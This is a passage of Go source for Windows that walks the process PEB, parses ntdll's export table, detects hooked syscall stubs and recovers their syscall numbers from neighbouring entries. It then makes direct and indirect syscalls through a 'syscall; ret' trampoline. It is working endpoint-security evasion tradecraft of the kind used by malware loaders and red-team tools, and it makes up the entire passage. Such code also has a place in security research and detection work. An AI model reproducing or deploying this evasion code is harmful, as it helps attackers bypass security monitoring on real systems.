		uintptr(unsafe.Pointer(&length)),      //4
		uintptr(alloctype),                    //5
		uintptr(protect),                      //6
	)
	if err != nil {
		return 0, fmt.Errorf("1 %s %x\n", err, err1)
	}

	return BaseAddress, nil
}

// Syscall resolves the syscall number recorded for ntapi and passes it,
// together with argh, to bpSyscall.
//
// ntapi must start with "Nt" or "Zw"; the matching slice
// (exportedNtFunctions or exportedZwFunctions) is searched linearly for an
// entry with exactly that name. Any other prefix is rejected.
//
// It returns the value produced by bpSyscall as errcode. err is non-nil when
// the name has an unsupported prefix, when the resolved number is 0, or when
// errcode is non-zero.
func (dll *dllstruct) Syscall(ntapi string, argh ...uintptr) (errcode uint32, err error) {
	var ssn uint16 = 0

	if strings.HasPrefix(ntapi, "Nt") {
		for _, fun := range dll.exportedNtFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				break
			}
		}

	} else if strings.HasPrefix(ntapi, "Zw") {
		for _, fun := range dll.exportedZwFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				break
			}
		}

	} else {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	// ssn is still 0 when no entry matched; an entry whose recorded number
	// is 0 is treated the same way.
	if ssn == 0 {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}
	fmt.Printf("[!] Calling direct syscall: %s SSN: 0x%x \n", ntapi, ssn)

	errcode = bpSyscall(ssn, argh...)

	// Any non-zero result is reported as an error; the raw value is still
	// returned so the caller can inspect it.
	if errcode != 0 {
		err = fmt.Errorf("non-zero return from syscall")
	}
	return errcode, err
}

// IndirectSyscall resolves the syscall number and trampoline address recorded
// for ntapi and passes them, together with argh, to execIndirectSyscall.
//
// ntapi must start with "Nt" or "Zw"; the matching slice
// (exportedNtFunctions or exportedZwFunctions) is searched linearly for an
// entry with exactly that name. Any other prefix is rejected.
//
// It returns the value produced by execIndirectSyscall as errcode. err is
// non-nil when the name has an unsupported prefix, when both the resolved
// number and the trampoline are 0, or when errcode is non-zero.
func (dll *dllstruct) IndirectSyscall(ntapi string, argh ...uintptr) (errcode uint32, err error) {
	var ssn uint16 = 0
	var trampoline uintptr = 0

	if strings.HasPrefix(ntapi, "Nt") {
		for _, fun := range dll.exportedNtFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				trampoline = fun.trampoline
				break
			}
		}

	} else if strings.HasPrefix(ntapi, "Zw") {
		for _, fun := range dll.exportedZwFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				trampoline = fun.trampoline
				break
			}
		}

	} else {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	// Both values are still 0 when no entry matched. Only the combination
	// is rejected; a single zero value passes this check.
	if ssn == 0 && trampoline == 0 {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	fmt.Printf("[!] Calling Indirect syscall: %s SSN: 0x%x Trampoline: %x\n", ntapi, ssn, trampoline)
	errcode = execIndirectSyscall(ssn, trampoline, argh...)
	// Any non-zero result is reported as an error; the raw value is still
	// returned so the caller can inspect it.
	if errcode != 0 {
		err = fmt.Errorf("non-zero return from syscall")
	}
	return errcode, err
}

// execIndirectSyscall is declared without a body; its implementation is
// expected to live in an assembly file in the same package. It takes the
// syscall number, the trampoline address and the call arguments, and returns
// the resulting status value.
func execIndirectSyscall(ssn uint16, trampoline uintptr, argh ...uintptr) (errcode uint32)

// bpSyscall is declared without a body; its implementation is expected to
// live in an assembly file in the same package. It takes the syscall number
// and the call arguments, and returns the resulting status value.
func bpSyscall(ssn uint16, argh ...uintptr) (errcode uint32)

// PrintExports prints two tables to standard output: one for the collected
// Nt* exports followed by one for the Zw* exports. Each row shows the entry's
// index in its list, function address, name, syscall number, trampoline
// address and hook flag. NtQuerySystemTime and ZwQuerySystemTime are left out
// of the listing.
func (dll *dllstruct) PrintExports() {
	hidden := []string{"NtQuerySystemTime", "ZwQuerySystemTime"}

	// render builds and renders the table for one export list.
	render := func(exports []Exportfunc) string {
		w := table.NewWriter()
		w.AppendHeader(table.Row{"#", "Function Address", "Function Name", "SysCallNo (SSN)", "Trampoline", "Hooked?"})
		for idx := range exports {
			entry := exports[idx]
			if slices.Contains(hidden, entry.name) {
				continue
			}
			w.AppendRow(table.Row{
				idx,
				fmt.Sprintf("0x%x", entry.functionAddress),
				entry.name,
				fmt.Sprintf("0x%x", entry.syscallno),
				fmt.Sprintf("0x%x", entry.trampoline),
				entry.isHooked,
			})
		}
		return w.Render()
	}

	ntTable := render(dll.exportedNtFunctions)
	zwTable := render(dll.exportedZwFunctions)
	fmt.Println(ntTable)
	fmt.Println(zwTable)
}

// UnhookFuncs reconstructs the syscall number of every export flagged as
// hooked and clears the flag once a number has been derived.
//
// The number is inferred from a neighbour in the same list, on the assumption
// that consecutive entries carry consecutive syscall numbers (the lists are
// sorted by function RVA in GetModuleExports):
//   - normally the predecessor's number plus one is used;
//   - when there is no usable predecessor (first entry, or the predecessor
//     could not be recovered either), the nearest following unhooked entry is
//     used and its distance is subtracted.
//
// Entries for which no neighbour yields a number are left flagged as hooked.
func (dll *dllstruct) UnhookFuncs() {
	recoverSSNs := func(funcs []Exportfunc) {
		for i := range funcs {
			if !funcs[i].isHooked {
				continue
			}

			// The predecessor is either clean or was recovered earlier in this pass.
			if i > 0 && !funcs[i-1].isHooked {
				funcs[i].syscallno = funcs[i-1].syscallno + 1
				funcs[i].isHooked = false
				continue
			}

			// No usable predecessor: derive the number from the next clean entry.
			for j := i + 1; j < len(funcs); j++ {
				if funcs[j].isHooked {
					continue
				}
				distance := uint16(j - i)
				if funcs[j].syscallno >= distance { // avoid wrapping below zero
					funcs[i].syscallno = funcs[j].syscallno - distance
					funcs[i].isHooked = false
				}
				break
			}
		}
	}

	recoverSSNs(dll.exportedNtFunctions)
	recoverSSNs(dll.exportedZwFunctions)
}

// GetSyscallNumbers inspects the first bytes at fun.functionAddress and fills
// in fun.syscallno and fun.isHooked.
//
// When the function starts with 4c 8b d1 b8 (mov r10, rcx; mov eax, imm32) it
// is considered unhooked and the low 16 bits of the immediate are stored as
// the syscall number. Any other prologue marks the function as hooked and
// stores the placeholder 0xffff.
//
// The address parameter is not used; it is kept so existing callers compile.
func (fun *Exportfunc) GetSyscallNumbers(address uintptr) {
	// Six bytes are needed: the four prologue bytes plus the 16-bit number.
	stub := (*[6]byte)(unsafe.Pointer(fun.functionAddress))

	if stub[0] == 0x4c && stub[1] == 0x8b && stub[2] == 0xd1 && stub[3] == 0xb8 {
		// The immediate is stored little-endian.
		fun.syscallno = uint16(stub[4]) | uint16(stub[5])<<8
		fun.isHooked = false
		return
	}

	fun.syscallno = 0xffff
	fun.isHooked = true
}

// GetModuleExports walks the module's export name table and records every
// export whose name starts with "Nt" (minus a short exclusion list) or "Zw"
// in dll.exportedNtFunctions / dll.exportedZwFunctions.
//
// For each recorded export it stores the function RVA and absolute address,
// the address of the first "syscall; ret" byte sequence (0f 05 c3) found
// within 100 bytes of the function start (0 when none is found), and the
// syscall number / hook flag computed by GetSyscallNumbers. Both lists are
// finally sorted by function RVA.
//
// dll.address and dll.exportDirectory must already be populated.
func (dll *dllstruct) GetModuleExports() {

	exclusions := []string{"NtdllDefWindowProc_A", "NtdllDefWindowProc_W", "NtdllDialogWndProc_A", "NtdllDialogWndProc_W", "NtGetTickCount"}

	// findSyscallRet returns the address of the first 0f 05 c3 sequence in the
	// 100 bytes starting at start, or 0 when the window does not contain one.
	findSyscallRet := func(start uintptr) uintptr {
		for off := uintptr(0); off < 100; off++ {
			code := (*[3]byte)(unsafe.Pointer(start + off))
			if code[0] == 0x0f && code[1] == 0x05 && code[2] == 0xc3 {
				return start + off
			}
		}
		return 0
	}

	dir := &dll.exportDirectory
	namesTable := dll.address + uintptr(dir.AddressOfNames)
	ordinalsTable := dll.address + uintptr(dir.AddressOfNameOrdinals)
	functionsTable := dll.address + uintptr(dir.AddressOfFunctions)

	for i := uintptr(0); i < uintptr(dir.NumberOfNames); i++ {
		nameRVA := *(*uint32)(unsafe.Pointer(namesTable + i*4))
		name := windows.BytePtrToString((*byte)(unsafe.Pointer(dll.address + uintptr(nameRVA))))

		var target *[]Exportfunc
		switch {
		case strings.HasPrefix(name, "Nt") && !slices.Contains(exclusions, name):
			target = &dll.exportedNtFunctions
		case strings.HasPrefix(name, "Zw"):
			target = &dll.exportedZwFunctions
		default:
			continue
		}

		// The name table and the ordinal table are parallel arrays: entry i of
		// the ordinal table is the index into the function address table for
		// name i. Name order and address-table order are not guaranteed to match.
		ordinal := *(*uint16)(unsafe.Pointer(ordinalsTable + i*2))
		if uint32(ordinal) >= dir.NumberOfFunctions {
			continue // malformed entry: index outside the address table
		}
		funcRVA := *(*uint32)(unsafe.Pointer(functionsTable + uintptr(ordinal)*4))
		funcAddress := dll.address + uintptr(funcRVA)

		funcExp := Exportfunc{
			funcRVA:         funcRVA,
			functionAddress: funcAddress,
			name:            name,
			trampoline:      findSyscallRet(funcAddress),
		}
		funcExp.GetSyscallNumbers(dll.address)
		*target = append(*target, funcExp)
	}

	sort.SliceStable(dll.exportedNtFunctions, func(i, j int) bool {
		return dll.exportedNtFunctions[i].funcRVA < dll.exportedNtFunctions[j].funcRVA
	})
	sort.SliceStable(dll.exportedZwFunctions, func(i, j int) bool {
		return dll.exportedZwFunctions[i].funcRVA < dll.exportedZwFunctions[j].funcRVA
	})
}

// GetImageExportDirectory copies the export directory header found at
// dll.exportDirectoryAddress into dll.exportDirectory, one field at a time
// from its fixed byte offset. The fields of interest to the rest of the code
// are:
//   - AddressOfFunctions
//   - AddressOfNames
//   - AddressOfNameOrdinals (maybe in the future)
//   - the number of functions / names
func (dll *dllstruct) GetImageExportDirectory() {
	start := dll.exportDirectoryAddress

	// Small readers for the two field widths used by the header.
	word := func(offset uintptr) uint16 {
		return *(*uint16)(unsafe.Pointer(start + offset))
	}
	dword := func(offset uintptr) uint32 {
		return *(*uint32)(unsafe.Pointer(start + offset))
	}

	dir := &dll.exportDirectory
	dir.Characteristics = dword(0x0)
	dir.TimeDateStamp = dword(0x4)
	dir.MajorVersion = word(0x8)
	dir.MinorVersion = word(0xa)
	dir.Name = dword(0xc)
	dir.Base = dword(0x10)
	dir.NumberOfFunctions = dword(0x14)
	dir.NumberOfNames = dword(0x18)
	dir.AddressOfFunctions = dword(0x1c)
	dir.AddressOfNames = dword(0x20)
	dir.AddressOfNameOrdinals = dword(0x24)
}

// getExportTableAddress locates the export directory of the module mapped at
// dll.address, stores its absolute address in dll.exportDirectoryAddress and
// returns it.
//
// The lookup follows the PE headers: the dword at offset 0x3c of the image
// gives the offset of the NT headers; the export table entry is then read
// from a fixed offset inside the optional header and added to the image base.
func (dll *dllstruct) getExportTableAddress() uintptr {
	const (
		ntHeaderOffsetField = 0x3c // location of the NT header offset in the DOS header
		signatureSize       = 0x4  // bytes skipped before the file header
		// https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_file_header
		fileHeaderSize    = 0x14 // size of the image_file_header struct
		exportEntryOffset = 0x70 // offset to export table inside the optional header
	)

	ntHeaderOffset := *(*uint32)(unsafe.Pointer(dll.address + ntHeaderOffsetField))
	exportEntry := dll.address + uintptr(ntHeaderOffset) + signatureSize + fileHeaderSize + exportEntryOffset
	exportRVA := *(*uint32)(unsafe.Pointer(exportEntry))

	dll.exportDirectoryAddress = dll.address + uintptr(exportRVA)
	return dll.exportDirectoryAddress
}

// GetStructOfLoadedDll returns the entry of the module called name from the
// list produced by ListDllFromPEB.
//
// The comparison ignores case, since Windows module names are not
// case-sensitive (a module listed as "KERNEL32.DLL" is found when asking for
// "kernel32.dll"). When no module matches, a zero dllstruct and an error are
// returned.
func GetStructOfLoadedDll(name string) (dllstruct, error) {
	for _, module := range ListDllFromPEB() {
		if strings.EqualFold(module.name, name) {
			return module, nil
		}
	}
	return dllstruct{}, fmt.Errorf("dll not Found")
}

// PrintModules prints a banner followed by a table of every module returned
// by ListDllFromPEB, showing its index, name and base address.
func PrintModules() {
	fmt.Printf("---------------------------------------------\nLoaded modules in current process\n")

	out := table.NewWriter()
	out.AppendHeader(table.Row{"#", "DLL Name", "Address"})

	modules := ListDllFromPEB()
	for idx := range modules {
		baseAddress := fmt.Sprintf("0x%x", modules[idx].address)
		out.AppendRow(table.Row{idx, modules[idx].name, baseAddress})
	}

	fmt.Println(out.Render())
}

// ListDllFromPEB returns the name and base address of every module linked
// into the in-memory-order module list of the current process's PEB.
//
// The list is circular: the last entry links back to the list head stored in
// the loader data, which is not itself a module entry. The walk therefore
// stops when it reaches the head again instead of reading module fields from
// it. An entry with an empty name also ends the walk.
//
// The field offsets used here are for 64-bit processes; they are different
// for 32-bit processes.
func ListDllFromPEB() []dllstruct {

	peb := windows.RtlGetCurrentPeb()
	head := &peb.Ldr.InMemoryOrderModuleList
	loadedModules := []dllstruct{}

	for link := head.Flink; link != nil && link != head; link = link.Flink {
		// The list links sit 0x10 bytes into the _LDR_DATA_TABLE_ENTRY structure.
		entry := uintptr(unsafe.Pointer(link)) - 0x10
		// +0x30 Dllbase address
		// +0x58 +0x8 address holding the address pointing to base dllname
		DllBase := entry + 0x30
		BaseDllName := entry + 0x58 + 0x8

		namePtr := *((*uintptr)(unsafe.Pointer(BaseDllName)))
		dllNameStr := windows.UTF16PtrToString((*uint16)(unsafe.Pointer(namePtr)))
		if dllNameStr == "" {
			break
		}

		dllbaseaddr := *((*uintptr)(unsafe.Pointer(DllBase)))
		loadedModules = append(loadedModules, dllstruct{
			name:                dllNameStr,
			address:             dllbaseaddr,
			exportedNtFunctions: []Exportfunc{},
			exportedZwFunctions: []Exportfunc{},
		})
	}

	return loadedModules
}

Last updated